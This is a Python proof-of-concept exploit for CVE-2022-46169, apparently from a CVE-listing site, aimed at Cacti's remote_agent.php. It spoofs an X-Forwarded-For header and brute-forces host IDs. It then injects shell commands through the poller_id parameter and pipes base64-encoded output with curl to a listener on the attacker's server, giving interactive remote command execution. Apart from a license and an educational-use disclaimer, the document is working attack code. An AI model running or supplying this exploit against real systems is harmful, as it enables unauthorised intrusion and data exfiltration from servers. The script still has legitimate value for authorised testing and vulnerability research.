4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2022-46169_helper.py PY
# MIT License
# 
# Copyright (c) 2023 Anthony Hanel
# 
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# 
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# 
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# 
# This script is intended for educational purposes and lawful use only. 
# Always obtain proper authorization before performing any kind of penetration 
# testing or security assessment.

import os
import http.server
import socketserver
import argparse
import subprocess
from time import sleep
import urllib.request
import threading
import base64
import readline
import sys
import requests

httpd_server = None   # global reference to the server
valid_host_id = -1    # reduce redundant traffic once a valid host_id has been found

class RequestHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.print_received_data()

    def do_POST(self):
        self.print_received_data()

    def print_received_data(self):
        content_length = int(self.headers.get('Content-Length', 0))
        incoming_data = self.rfile.read(content_length)
        decoded_data = base64.b64decode(incoming_data.decode()).decode()
        print(f"\nReceived from victim:\n{decoded_data}")

def start_server(listening_port):
    global httpd_server
    Handler = RequestHandler
    httpd_server = socketserver.TCPServer(("", listening_port), Handler)
    print("Server is now listening on port: ", listening_port, "\n")
    httpd_server.serve_forever()


def process_user_commands(target_url, server_ip, server_port, max_host_ids=100, max_local_data_ids=50):
    sleep(0.25)
    while True:
        user_cmd = input("Enter a command to execute on the target: ")
        if user_cmd.lower() == "exit":
            break
        execute_exploit(target_url, user_cmd, max_host_ids, max_local_data_ids, server_ip, server_port)

def send_exploit_request(target_url, user_cmd, host_id, max_local_data_ids, server_ip, server_port):
    payload = f'; /bin/sh -c "{user_cmd}" | base64 | curl -XPOST -d @- http://{server_ip}:{server_port}'
    local_data_ids = list(range(max_local_data_ids))

    exploit_url = f'{target_url}/remote_agent.php'
    request_params = {
        'action': 'polldata',
        'host_id': host_id,
        'poller_id': payload,
        'local_data_ids[]': local_data_ids
    }
    request_headers = {'X-Forwarded-For': '127.0.0.1'}

    try:
        response = requests.get(exploit_url, params=request_params, headers=request_headers)
        if 'proc' in response.text:
            return True
        else:
            return False
    except requests.RequestException as e:
        print(f"Error occurred while sending request: {e}")
        return False

def execute_exploit(target_url, user_cmd, max_host_ids, max_local_data_ids, server_ip, server_port):
    global valid_host_id
    if valid_host_id != -1:
        send_exploit_request(target_url, user_cmd, valid_host_id, max_local_data_ids, server_ip, server_port)
    else:
        for host_id in range(max_host_ids):
            print(f"[*] Trying host_id: {host_id}")
            success = send_exploit_request(target_url, user_cmd, host_id, max_local_data_ids, server_ip, server_port)
            if success:
                valid_host_id = host_id
                print(f"[+] Successful exploitation with host_id = {valid_host_id}")
                break

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('--target', required=True, help='Target URL (e.g., http://10.10.11.211)')
    parser.add_argument('--server', required=True, help='IP address for the listening server (e.g., 10.10.14.86)')
    parser.add_argument('--port', default=5000, type=int, help='Port number for the listening server (e.g., 5000)')

    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        sys.exit(1)

    args = parser.parse_args()

    print("\nCurrent configuration:")
    print(f"  Target: {args.target}")
    print(f"  Listening Server IP: {args.server}")
    print(f"  Listening Server Port: {args.port}\n")

    server_thread = threading.Thread(target=start_server, args=(args.port,))
    server_thread.start()

    try:
        # Pass the server thread to the process_user_commands function
        process_user_commands(args.target, args.server, args.port)
        print("\nTerminating server...")
        httpd_server.shutdown()  # tell the server to stop
        server_thread.join()  # now we can join the server thread
        print("Server terminated :)")
        exit(1)
    except KeyboardInterrupt:
        print("\nCtrl+C received. Shutting down.")
        httpd_server.shutdown()  # tell the server to stop
        server_thread.join()
        exit(0)